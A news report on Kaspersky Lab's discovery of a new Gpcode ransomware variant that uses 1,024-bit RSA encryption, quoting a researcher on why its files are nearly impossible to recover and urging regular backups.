Researchers at Kaspersky Lab have identified a new and improved variant
of the blackmailing Gpcode trojan, which encrypts files on a victim's
computer and then demands payment in exchange for the keys.
"He [the author] makes an encrypted copy of the files and deletes the
original files," Roel Schouwenberg, a senior anti-virus researcher at
Kaspersky, told SCMagazineUS.com on Friday. "All that's left on the
user's machine is an encrypted version of the files."
Experts first spotted this malware about three years ago, when the
author used 660-bit encryption to hold victim's files -- including MP3s,
photos, documents -- hostage until the user paid up, Schouwenberg said.
However, the Kaspersky team was able to crack the encryption and offer
the key to its users; this time, the malware author is using a
1,024-bit RSA key, he said. It is unclear how widespread the infection
rate is.
"The major difference between back then and now is that the author has
seemed to learn from his mistakes," he said. "It's almost impossible to
crack this key. We have been unable to track down any implementation
errors."
In addition, the author is employing a number of different variants of
Gpcode, each responding to a different public and private key,
Schouwenberg said. That rules out the possibility of using brute force
as a way to crack the key.
Researchers are unsure exactly how attackers seed the victim's machine
with the trojan -- social engineering is the likeliest technique -- but
users are encouraged to keep their anti-virus signatures up to date.
Schouwenberg warned, though, that if the attacker uses a
yet-to-be-detected variant of the malware, only making regular backups
will prevent the files from being harmed.
"The reason we are making such a big fuss about this is because if you
don't have any recent backups, you basically can consider your files
lost," he said.
That is, unless you agree to pay for the private key -- around $100 --
although that is no guarantee the files will be safe, Schouwenberg said.